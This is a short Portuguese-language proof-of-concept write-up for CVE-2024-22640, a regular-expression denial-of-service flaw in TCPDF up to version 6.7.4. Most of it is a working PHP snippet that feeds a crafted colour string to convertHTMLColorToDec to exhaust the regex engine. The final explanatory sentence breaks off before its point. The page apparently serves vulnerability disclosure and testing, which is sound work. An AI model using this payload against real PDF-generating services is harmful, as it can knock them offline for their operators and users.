
Exploit de prova de conceito para CVE-2024-22640, uma vulnerabilidade ReDoS no TCPDF <=6.7.4 acionada por uma entrada de cor HTML manipulada, com código de demonstração.
Negação de Serviço por Expressão Regular (ReDoS)
TCPDF <= 6.7.4
A análise de cor HTML do TCPDF contém um payload manipulado.
A versão TCPDF <= 6.7.4 é vulnerável a ReDoS (Negação de Serviço por Expressão Regular) ao analisar uma página HTML não confiável com uma cor manipulada.
<?php
require_once('../tcpdf.php');
$test = new TCPDF_COLORS();
$ref = "none";
$test -> convertHTMLColorToDec('["t"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!]',$ref);
?>
Nota: Verificando com preg_last_error() após a linha de código vulnerável, a regEx sairá com .